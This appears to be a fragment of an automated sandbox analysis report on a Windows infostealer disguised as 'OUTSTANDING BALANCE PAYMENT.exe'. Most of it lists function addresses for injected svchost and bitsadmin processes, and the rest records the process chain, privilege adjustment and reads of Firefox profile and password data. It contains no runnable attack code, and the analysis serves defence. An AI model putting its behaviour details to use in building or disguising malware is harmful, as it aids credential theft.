                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B8E2_2_00416B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B932_2_00416B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C402_2_00401C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C3A2_2_00401C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E51C2_2_0040E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5232_2_0040E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E492_2_00402E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E502_2_00402E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F192_2_00402F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027202_2_00402720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC02C02_2_02FC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE02742_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030003E62_2_030003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F02_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA3522_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030001AA2_2_030001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD20002_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF81CC2_2_02FF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF41A22_2_02FF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC81582_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA1182_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F301002_2_02F30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C6E02_2_02F5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C02_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F407702_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F647502_2_02F64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEE4F62_2_02FEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030005912_2_03000591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF24462_2_02FF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE44202_2_02FE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F405352_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA802_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6BD72_2_02FF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB402_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E8F02_2_02F6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F268B82_2_02F268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300A9A62_2_0300A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4A8402_2_02F4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F428402_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A02_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F569622_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEEDB2_2_02FFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52E902_2_02F52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFCE932_2_02FFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40E592_2_02F40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEE262_2_02FFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4CFE02_2_02F4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32FC82_2_02F32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBEFA02_2_02FBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4F402_2_02FB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60F302_2_02F60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE2F302_2_02FE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F82F282_2_02F82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30CF22_2_02F30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0CB52_2_02FE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40C002_2_02F40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3ADE02_2_02F3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F58DBF2_2_02F58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDCD1F2_2_02FDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AD002_2_02F4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE12ED2_2_02FE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B2C02_2_02F5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F452A02_2_02F452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F8739A2_2_02F8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D34C2_2_02F2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF132D2_2_02FF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70E92_2_02FF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF0E02_2_02FFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF0CC2_2_02FEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F470C02_2_02F470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B16B2_2_0300B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B1B02_2_02F4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1722_2_02F2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7516C2_2_02F7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF16CC2_2_02FF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F856302_2_02F85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF7B02_2_02FFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F314602_2_02F31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF43F2_2_02FFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030095C32_2_030095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD5B02_2_02FDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75712_2_02FF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEDAC62_2_02FEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDDAAC2_2_02FDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F85AA02_2_02F85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE1AA32_2_02FE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB3A6C2_2_02FB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA492_2_02FFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7A462_2_02FF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB5BF02_2_02FB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DBF92_2_02F7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FB802_2_02F5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB762_2_02FFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438E02_2_02F438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAD8002_2_02FAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD22_2_02F03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD52_2_02F03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EA02C05_2_02EA02C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EC02745_2_02EC0274
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EE03E65_2_02EE03E6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E2E3F05_2_02E2E3F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDA3525_2_02EDA352
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EB20005_2_02EB2000
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED81CC5_2_02ED81CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EE01AA5_2_02EE01AA
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED41A25_2_02ED41A2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EA81585_2_02EA8158
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E101005_2_02E10100
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EBA1185_2_02EBA118
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E3C6E05_2_02E3C6E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E1C7C05_2_02E1C7C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E207705_2_02E20770
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E447505_2_02E44750
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ECE4F65_2_02ECE4F6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED24465_2_02ED2446
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EC44205_2_02EC4420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EE05915_2_02EE0591
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E205355_2_02E20535
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E1EA805_2_02E1EA80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED6BD75_2_02ED6BD7
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDAB405_2_02EDAB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E4E8F05_2_02E4E8F0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E068B85_2_02E068B8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E228405_2_02E22840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E2A8405_2_02E2A840
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E229A05_2_02E229A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EEA9A65_2_02EEA9A6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E369625_2_02E36962
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDEEDB5_2_02EDEEDB
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E32E905_2_02E32E90
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDCE935_2_02EDCE93
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E20E595_2_02E20E59
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDEE265_2_02EDEE26
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E2CFE05_2_02E2CFE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E12FC85_2_02E12FC8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E9EFA05_2_02E9EFA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E94F405_2_02E94F40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E62F285_2_02E62F28
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E40F305_2_02E40F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EC2F305_2_02EC2F30
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E10CF25_2_02E10CF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EC0CB55_2_02EC0CB5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E20C005_2_02E20C00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E1ADE05_2_02E1ADE0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E38DBF5_2_02E38DBF
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E2AD005_2_02E2AD00
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EBCD1F5_2_02EBCD1F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EC12ED5_2_02EC12ED
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E3B2C05_2_02E3B2C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E252A05_2_02E252A0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E6739A5_2_02E6739A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E0D34C5_2_02E0D34C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED132D5_2_02ED132D
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED70E95_2_02ED70E9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDF0E05_2_02EDF0E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ECF0CC5_2_02ECF0CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E270C05_2_02E270C0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E2B1B05_2_02E2B1B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EEB16B5_2_02EEB16B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E5516C5_2_02E5516C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E0F1725_2_02E0F172
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED16CC5_2_02ED16CC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E656305_2_02E65630
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDF7B05_2_02EDF7B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E114605_2_02E11460
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDF43F5_2_02EDF43F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EE95C35_2_02EE95C3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EBD5B05_2_02EBD5B0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED75715_2_02ED7571
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ECDAC65_2_02ECDAC6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E65AA05_2_02E65AA0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EBDAAC5_2_02EBDAAC
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EC1AA35_2_02EC1AA3
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E93A6C5_2_02E93A6C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDFA495_2_02EDFA49
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED7A465_2_02ED7A46
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E95BF05_2_02E95BF0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E5DBF95_2_02E5DBF9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E3FB805_2_02E3FB80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDFB765_2_02EDFB76
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E238E05_2_02E238E0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E8D8005_2_02E8D800
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E299505_2_02E29950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E3B9505_2_02E3B950
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EB59105_2_02EB5910
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E29EB05_2_02E29EB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02DE3FD55_2_02DE3FD5
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02DE3FD25_2_02DE3FD2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDFFB15_2_02EDFFB1
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E21F925_2_02E21F92
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDFF095_2_02EDFF09
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02EDFCF25_2_02EDFCF2
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E99C325_2_02E99C32
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E3FDC05_2_02E3FDC0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED7D735_2_02ED7D73
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E23D405_2_02E23D40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02ED1D5A5_2_02ED1D5A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00321D605_2_00321D60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0031CC605_2_0031CC60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0031AE605_2_0031AE60
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0031CE805_2_0031CE80
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0031AFB05_2_0031AFB0
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0031AFA95_2_0031AFA9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_003254205_2_00325420
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_003236205_2_00323620
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0032361B5_2_0032361B
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0033BB405_2_0033BB40
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02C3E3575_2_02C3E357
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02C3E4745_2_02C3E474
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02C4541C5_2_02C4541C
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02C3CB785_2_02C3CB78
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02C3D8D85_2_02C3D8D8
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02C3E80F5_2_02C3E80F
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02C45C115_2_02C45C11
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 02E0B970 appears 280 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 02E8EA12 appears 86 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 02E67E54 appears 111 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 02E9F290 appears 105 times
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: String function: 02E55130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 280 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: String function: 00B7EC2F appears 68 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: String function: 00B8F8A0 appears 35 times
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: String function: 00B86AC0 appears 42 times
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2023684776.000000000423D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OUTSTANDING BALANCE PAYMENT.exe
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2024253355.00000000040E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OUTSTANDING BALANCE PAYMENT.exe
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@10/9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BACE7A GetLastError,FormatMessageW,0_2_00BACE7A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9AB84 AdjustTokenPrivileges,CloseHandle,0_2_00B9AB84
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B9B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B9B134
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00BAE1FD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00BA6532
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BBC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00BBC18C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B6406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00B6406B
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeFile created: C:\Users\user\AppData\Local\Temp\aut8245.tmpJump to behavior
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 00000005.00000003.2433205570.0000000002BBB000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2433205570.0000000002B99000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3859638614.0000000002BC5000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3859638614.0000000002BE7000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3859638614.0000000002BBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OUTSTANDING BALANCE PAYMENT.exeReversingLabs: Detection: 28%
                Source: unknownProcess created: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"Jump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: mpr.dllJump to behavior
